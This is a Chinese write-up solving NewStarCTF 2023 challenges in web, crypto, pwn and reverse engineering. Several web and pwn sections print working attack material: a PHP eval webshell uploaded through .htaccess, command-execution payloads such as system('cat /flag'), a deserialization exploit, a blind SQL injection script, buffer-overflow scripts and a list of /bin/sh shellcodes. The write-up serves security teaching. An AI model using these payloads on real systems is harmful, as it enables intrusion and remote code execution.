NewStarCTF 2023 公开赛道 WEEK1

web

WEEK1|WEB 泄漏的秘密

http://cd98ca4d-7c72-4499-9cb1-010764aa19de.node4.buuoj.cn:81/robots.txt

http://cd98ca4d-7c72-4499-9cb1-010764aa19de.node4.buuoj.cn:81/www.zip
PART ONE: flag{r0bots_1s_s0_us3ful
$PART_TWO = “_4nd_www.zip_1s_s0_d4ng3rous}";

WEEK1|WEB Begin of Upload

前端拦截
image-20220126203415648

WEEK1|WEB Begin of HTTP

http://node4.buuoj.cn:29356/?ctf=1
base64_decode(bjN3c3Q0ckNURjIwMjNnMDAwMDBk
改一下cookie

image-20220126203415648

WEEK1|WEB ErrorFlask

http://e8e7a85b-f054-4efa-8acd-d609723abc02.node4.buuoj.cn:81/?number1=49&number2=2
随便传个参数,源码泄露
image-20220126203415648

WEEK1|WEB Begin of PHP

代码很长,都是基础的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<?php  
error_reporting(0);  
highlight_file(__FILE__);  
  
if(isset($_GET['key1']) && isset($_GET['key2'])){  
    echo "=Level 1=<br>";  
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){        $flag1 True;  
    }else{  
        die("nope,this is level 1");  
    }  
}  
  
if($flag1){  
    echo "=Level 2=<br>";  
    if(isset($_POST['key3'])){  
        if(md5($_POST['key3']) === sha1($_POST['key3'])){            $flag2 True;  
        }  
    }else{  
        die("nope,this is level 2");  
    }  
}  
  
if($flag2){  
    echo "=Level 3=<br>";  
    if(isset($_GET['key4'])){  
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){  //用[]绕过strcmp
                  $flag3 True;  
        }else{  
            die("nope,this is level 3");  
        }  
    }  
}  
  
if($flag3){  
    echo "=Level 4=<br>";  
    if(isset($_GET['key5'])){  
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){            $flag4 True;  
        }else{  
            die("nope,this is level 4");  
        }  
    }  
}  
  
if($flag4){  
    echo "=Level 5=<br>";    extract($_POST);  
    foreach($_POST as $var){  
        if(preg_match("/[a-zA-Z0-9]/",$var)){  
            die("nope,this is level 5");  
        }  
    }  
    if($flag5){  
        echo file_get_contents("/flag");  
    }else{  
        die("nope,this is level 5");  
    }  
}
http://e9f2544c-4f0e-400c-b5d2-0aa335160abb.node4.buuoj.cn:81/?key1=QNKCDZO&key2=240610708&key4[]=1&key5=2222c
post:key3[]=1&flag5=%CE

WEEK1|WEB R!C!E!
1
2
3
4
5
6
7
8
9
10
<?php  
highlight_file(__FILE__);  
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){    $password=md5($_POST['password']);    $code=$_POST['e_v.a.l'];  
    if(substr($password,0,6)==="c4d038"){  
        if(!preg_match("/flag|system|pass|cat|ls/i",$code)){  
            eval($code);  
        }  
    }  
}

有个小密码,用python爆破一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import hashlib
import binascii
def mohu_md5():
    for i in range(1,1300000):
        t1 =  str(i)
        #t1 =  'XIPU'  str(i)+
        md5_result = hashlib.md5(t1.encode("utf-8")).hexdigest()
        #print(md5_result)
        if md5_result[0:6] == 'c4d038':
            # j = md5_result[10:24]
            #isdigit()判断是否为纯数字,是则为true 反之false
            # if j.isdigit():
                print(t1 + "----->"+md5_result)
                break
mohu_md5()

#114514----->c4d038b4bed09fdb1471ef51ec3a32cd

$_POST[‘e_v.a.l’]))这个eval传参的时候,要把_换成[,
post:
password=114514&e[v.a.l=eval($_POST['a']);&a=system('cat /flag');

WEEK1|WEB EasyLogin

admin爆破即可,加一下md5
image-20220126203415648

WEEK2|WEB 听说你是游戏高手?

看一下源码,大于100000000即可,json传参

image-20220126203415648image-20220126203415648

WEEK2|WEB include 0。0
1
2
3
4
<?php   highlight_file(__FILE__);   // FLAG in the flag.php   
$file $_GET['file'];
if(isset($file) && !preg_match('/base|rot/i',$file)){       @include($file);   }else{       die("nope");   }   ?>
nope

任意文件读取,过滤了base rot,可以用其他协议
http://a9e88e4f-6a32-485c-a733-fd09df8be832.node4.buuoj.cn:81/?file=php://filter/read=convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php
得到的东西再转回去即可

1
2
3
4
<?php
$str = "?<hp p//lfga4{2eb4dc-ece724-61-56a454-2c408bdd68}a";

echo iconv('UCS-2BE', 'UCS-2LE', $str);
WEEK2|WEB Unserialize?

反序列化,private变量被序列化时会产生\x00,要注意url编码
过滤了常用查看命令用nl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php  
highlight_file(__FILE__);  
// Maybe you need learn some knowledge about deserialize?  
class evil {  
    private $cmd;  
  
    public function __destruct()  
    {  
        if(!preg_match("/cat|tac|more|tail|base/i"$this->cmd)){  
            @system($this->cmd);  
        }  
    }  
}  
  
@unserialize($_POST['unser']);  
?>

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
class evil {

    private $cmd="nl /th1s_1s_fffflllll4444aaaggggg";

  

    public function __destruct()

    {

        if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){

            @system($this->cmd);

        }

    }

}
$s = new evil();

echo urlencode(serialize($s));
WEEK2|WEB ez_sql

sql注入,盲注
poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
import requests

  

sql_char = ['select',

            'union',

            'and',

            'or',

            'sleep',

            'where',

            'from',

            'limit',

            'group',

            'by',

            'like',

            'prepare',

            'as',

            'if',

            'char',

            'ascii',

            'mid',

            'left',

            'right',

            'substring',

            'handler',

            'updatexml',

            'extractvalue',

            'benchmark',

            'insert',

            'update',

            'all',

            '@',

            '#',

            '^',

            '&',

            '*',

            '\'',

            '"',

            '~',

            '`',

            '(',

            ')',

            '--',

            '=',

            '/',

            '\\',

            ' ']

  

for char in sql_char:

    res = requests.get("http://1f2edf21-fa95-4d74-8410-ad4faffbfb07.node4.buuoj.cn:81/?id=TMP0929"+char)

    if 'no!' in res.text:

        print("该字符是非法字符: {0}".format(char))

    else:

        print("通过: {0}".format(char))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
   
  
  
  

# 导入所需模块

import requests

import string

import time

  

# 构造字母表,根据字母表去爆破每一位的具体值

alphabet = string.ascii_letters + string.digits + "-,}{_="

print(alphabet)

  

# 题目的URL

url = "http://8c704eaf-a795-49b7-9951-a7b2f4811142.node4.buuoj.cn:81/?id=TMP0929"

  

# 注入什么数据,select变量就写什么子查询语句

select = "select database()"

select = "select group_concat(table_name) from information_schema.tables where table_schema=database()" #获取所有库名

select = "select group_concat(table_name) from information_schema.tables where table_schema='ctf'" #获取表名

select = "select group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='here_is_flag'"#获取字段名

  

select = "select flag from ctf.here_is_flag"

  
  

# 用来保存注入出的结果

result = ""

  

for i in range(1,100): # 外层循环,从1开始,因为截取的位数是从1开始的

    for ch in alphabet: # 内层循环,是具体需要测试的值

        # 构造SQL语句,发起请求

        #payload = f"' AND subStr((selEct database()) ,{i},1) = '{ch}' AND 'YSGl'='YSGl"

        payload = f"' AND subStr((SELECT flag FROM here_is_flag) ,{i},1) = '{ch}' AND 'YSGl'='YSGl"

        r = requests.get(url=url+payload)

        # 根据回显判断,如果得到了表示查询成功的回显,那么说明判断数据的这一位是正确的

        if ord(ch) < 66 :  #buu有429  sleep一下

            time.sleep(3)

        if "class_name" in r.text:

            result += ch

            print("注入成功:", result)

            print(url+payload)

            break # 这一位已经跑出来了,可以break掉然后下一轮循环跑下一位数据了

        # 如果已经跑到了字母表最后一位都还没有进到上面的if然后break,说明这轮循环没跑出来正确结果,说明注入完成(或者注入payload写的有问题注入失败),脚本没必要继续跑下去了

        # if ch == alphabet[-1]:

        #     print("注入完成")

        #     exit(0)

image-20220126203415648

WEEK2|WEB Upload again!

白名单,直接穿htaccess,包含即可

1
2
3
4
5
6
7
8
9
filename=".htaccess"
Content-Type: application/octet-stream

AddType application/x-httpd-php .jpg


GIF89a
<script language="php">eval($_POST['g']);</script>

image-20220126203415648

WEEK2|WEB R!!C!!E!!

扫描目录得到git泄露,访问/.git/index得到源码,打开乱码,不过可以看到bo0g1pop.php
image-20220126203415648
访问一下,无参数rce

1
2
3
4
5
6
7
<?php  
highlight_file(__FILE__);  
if (';' === preg_replace('/[^\W]+\((?R)?\)/'''$_GET['star'])) {  
    if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){  
        eval($_GET['star']);  
    }  
}

这里没有过滤getallheaders,直接用这个
GET /bo0g1pop.php?star=print_r(getallheaders());
先输出所有的header
image-20220126203415648

1
2
3
4
5
6
end() - 将内部指针指向数组中的最后一个元素,并输出。
next() - 将内部指针指向数组中的下一个元素,并输出。
prev() - 将内部指针指向数组中的上一个元素,并输出。
reset() - 将内部指针指向数组中的第一个元素,并输出。
each() - 返回当前元素的键名和键值,并将内部指针向前移动。
current() -输出数组中的当前元素的值。

然后挑一下上面那个指向数组的没有被ban,使用next
image-20220126203415648
,可以看到输出了ua,那调用这个ua,恶意传参即可,把print改成eval
/bo0g1pop.php?star=eval(next(getallheaders()));
image-20220126203415648
image-20220126203415648

WEEK1|CRYPTO brainfuck

随波逐流即可
image-20220126203415648

WEEK1|CRYPTO Caesar’s Secert

image-20220126203415648

WEEK1|CRYPTO Fence

image-20220126203415648

WEEK1|CRYPTO Vigenère

https://www.guballa.de/vigenere-solver
image-20220126203415648

WEEK1|CRYPTO babyencoding

base64
image-20220126203415648
base32
image-20220126203415648
uuencode
http://www.atoolbox.net/Tool.php?Id=731
image-20220126203415648

WEEK1|CRYPTO Small d
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from secret import flag
from Crypto.Util.number import *

p = getPrime(1024)
q = getPrime(1024)

d = getPrime(32)
e = inverse(d, (p-1)*(q-1))
n = p*q
m = bytes_to_long(flag)

c = pow(m,e,n)

print(c)
print(e)
print(n)

# c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
# e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
# n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433

e很大,维纳攻击
image-20220126203415648

WEEK1|CRYPTO babyrsa
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from Crypto.Util.number import *
from flag import flag

def gen_prime(n):
    res = 1

    for i in range(15):
        res *= getPrime(n)

    return res


if __name__ == '__main__':
    n = gen_prime(32)  #32位n
    e = 65537
    m = bytes_to_long(flag)
    c = pow(m,e,n)
    print(n)
    print(c)
# 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
# 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595

将n进行分解
image-20220126203415648
根据代码得到,n是15个素数相乘得来的,那么,fn就的所有素数-1然后相乘

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
  

from distutils.util import run_2to3

import gmpy2    

import binascii  

import libnum

  

p=2217990919

q=2338725373

r3=2370292207

r4=2463878387

r5=2706073949

r6=2794985117

r7=2804303069

r8=2923072267

r9=2970591037

r10=3207148519

r11=3654864131

r12=3831680819

r13=3939901243

r14=4093178561

r15=4278428893

c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595


n = p*q*r3 *r4 *r5 *r6 *r7 *r8*r9*r10*r11*r12*r13*r14*r15

fn = (p-1)*(q-1)*(r3-1)*(r4-1)*(r5-1)*(r6-1)*(r7-1)*(r8-1)*(r9-1)*(r10-1)*(r11-1)*(r12-1)*(r13-1)*(r14-1)*(r15-1)

e = 65537  

  

# invert是求乘法逆元    

d=gmpy2.invert(e,fn)

  

print(int(d))

m=pow(c,int(d),n)

print(m)

print(libnum.n2s(m))
WEEK1|CRYPTO babyxor
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# from secret import *
# ciphertext = []
# for f in flag:
#     ciphertext.append(f ^ key)
# print(bytes(ciphertext).hex())

# e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2

import  binascii

s = "e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2"

s = binascii.unhexlify(s)

for i in range(len(s)):

    for j in range(255):

        if s[0]^j == ord('f'):

            print(j)
#先用第一个e9亦或1-255,得出key,key为143,在所有的都亦或14
s = "e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2"

s = binascii.unhexlify(s)

for i in range(len(s)):

    print(chr(s[i]^143),end="")
 #flag{x0r_15_symm3try_and_e4zy!!!!!!} 
WEEK1|CRYPTO Vigenère
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# from flag import flag, key
# modulus = 256
# ciphertext = []


# for f in flag:
#     ciphertext.append((key[0]*f + key[1]) % modulus)

# print(bytes(ciphertext).hex())

import binascii

modulus = 256

s = "dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064"

s = binascii.unhexlify(s)

for i in range(256):

    for j in range(256):

        if (i*ord('f') + j) % modulus ==s[0]  and (i*ord('l') + j) % modulus ==s[1]  and (i*ord('a') + j) % modulus == s[2] :

            print(i,j)

  

a,b = 17,23

flag = ''

for i in range(len(s)):

    for k in range(255):

        if (a*k + b)%256 == s[i]:

            flag += chr(k)

            break

print(flag)

#flag{4ff1ne_c1pher_i5_very_3azy}

根据源码知道,a*flag+b =c字符,那么,设个方程即可,解出来后,再带回去,即可。

WEEK1|PWN ret2text

  /pwn/xinshengsai ❯ checksec ret2text ✘ INT  1m 16s root@Bohemian  11:08:48
[] Checking for new versions of pwntools
To disable this functionality, set the contents of /root/.cache/.pwntools-cache-3.8/update to ‘ever’ (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[] A newer version of pwntools is available on pypi (4.8.0 –> 4.11.0).
Update with: $ pip install -U pwntools
[*] ‘/pwn/xinshengsai/ret2text’
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
没有开保护
image-20220126203415648
拖到ida有binbash,
image-20220126203415648
溢出的话是20+8
poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *


#p = process("./pwn")
p= remote("node4.buuoj.cn",29481)
backdoor = 0x401212
payload= b'a'*(0x20+8) + p64(backdoor)

#p.recvuntil("Welcome!May I have your name?\n")

p.sendline(payload)
#p.sendline('cat flag')
#p.recvline(keepends=True)
#p.recvline(keepends=True)
#s = p.recv(numb = 2048, timeout = 3)
#sp = p.recv(numb = 5048, timeout = 3)
#print(sp)
p.interactive()

WEEK1|PWN Vigenère

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *


#p = process("./pwn")

p= remote("node4.buuoj.cn",26857)


from pwn import*
context(log_level = 'debug', arch = 'i386', os = 'linux')
payload = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'
shellcode=asm(shellcraft.sh())

#p.recvuntil("Welcome!May I have your name?\n")

p.sendline(payload)
#p.sendline('cat flag')
#p.recvline(keepends=True)
#p.recvline(keepends=True)
#s = p.recv(numb = 2048, timeout = 3)
#sp = p.recv(numb = 5048, timeout = 3)
#print(sp)
p.interactive()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
相关shellcode,https://blog.csdn.net/Xzzzz911/article/details/133468714
# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
 
# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA
 
# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh
 
# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05
 
# 64位 较短的shellcode  23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
 
# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
WEEK1|PWN p1eee

20+8
image-20220126203415648
bash地址126c
image-20220126203415648
poc:

1
2
3
4
5
6
7
8
9
10

from pwn import *
#p = process("./pwn6")
p= remote("node4.buuoj.cn",26148)
backdoor = 0x126C
payload= b'a'*(0x20+8) + p64(backdoor)


p.sendline(payload)
p.interactive()
WEEK1|REVERSE easy_RE

shift+f12看一下字符串,搜一下flag,有一个
image-20220126203415648
image-20220126203415648

WEEK1|REVERSE 咳

使用pe查一下
https://github.com/ExeinfoASL/ASL/tree/master

image-20220126203415648
upx的壳,
upx -d file即可,然后拖到ida中,看到关键函数,对str1-1操作等于enc,双击enc,得到字符串
image-20220126203415648
image-20220126203415648
gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~,
poc:

1
2
3
4
5
a = "gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~"

for i in a:

    print(chr(ord(i)-1),end="")
WEEK1|REVERSE Segments

 Action    name: ShowSegments

This command opens the segments window. The format of this window is explained here.

You can use list viewer commands in this window.

In order to change the selector values, use selectors window. 

中文翻译如下:

操作名称:ShowSegments

此命令打开段窗口。该窗口的格式在此处解释。

您可以在此窗口中使用列表查看器命令。

要更改选择器值,请使用选择器窗口。
提示了,shift+f7即可,看到
image-20220126203415648

WEEK1|REVERSE ELF

image-20220126203415648
for ( i = 0; i < strlen(a1); ++i )
{
v2 = v6++;
v4[v2] = (a1[i] ^ 0x20) + 16;
}
给每一个字符亦或0x20 然后加上16
image-20220126203415648
然后base64,
那么逆向的话就,先解base64 ,然后减 在亦或

1
2
3
4
5
6
7
8
9
10
11
  import base64

a = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"

s = base64.b64decode(a)

for i in s:

    print(chr((i-16)^0x20),end="")

#flag{D0_4ou_7now_wha7_ELF_1s?}

WEEK1|REVERSE Endian
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
  puts("please input your flag");
  __isoc99_scanf("%s");
  v5 = &v6;
  for ( i = 0; i <= 4; ++i )
  {
    if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )//数组和这个12345678亦或
    {
      printf("wrong!");
      exit(0);
    }
    v5 += 4;
  }
  printf("you are right");
  return 0;
双击array,有一个数组
.rodata:0000000000002010 array           dd 75553A1Eh, 7B583A03h, 4D58220Ch, 7B50383Dh, 736B3819h

image-20220126203415648
写个脚本,出理一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

from Crypto.Util.number import *

sums = 0

a = "75553A1E, 7B583A03, 4D58220C, 7B50383D, 736B3819"

a = a.split(", ")

for i in a:

    suma = int(i, 16)^0x12345678

    print(str(long_to_bytes(suma)[::-1]),end="",)

    #b'flag'b'{lli'b'ttl_'b'Endi'b'an_a'
 
WEEK1|REVERSE AndroXor

image-20220126203415648
拖到Androidkill中,看到代码
也就是每个字符与happyx3进行亦或,不够的循环即可,
poc:

1
2
3
4
5
6
7
8
9
10
11
key = "happyx3"

s = "14, 13, 17, 23, 2, 75, 73, 55, 32, 30, 20, 73, 10, 2, 12, 62, 40, 64, 11, 39, 75, 89, 25, 65, 13 "

index = 0

s = s.split(", ")

for i in range(len(s)):

    print(chr(int(s[i])^ord((key[i%7]))), end="")
WEEK1|REVERSE EzPE

文件打不开,看一下文件十六进制头,exe的文件头为4D5A90,改一下
image-20220126203415648
https://thunderjie.github.io/2019/03/27/PE%E7%BB%93%E6%9E%84%E8%AF%A6%E8%A7%A3/
再将90 改成80

shiift + e ida选中数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
lis = [0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C,

  0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51,

  0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04,

  0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]

for index in range(35, -1, -1):

    #print((index ^ lis[index+1])^ lis[index] )

    lis[index] = index ^ lis[index+1] ^ lis[index]  #lis[34] = 34 ^ lis[35] ^ lis[34]的值

    print(lis)
WEEK1|REVERSE lazy_activtiy

拖到andkill里直接搜flag

image-20220126203415648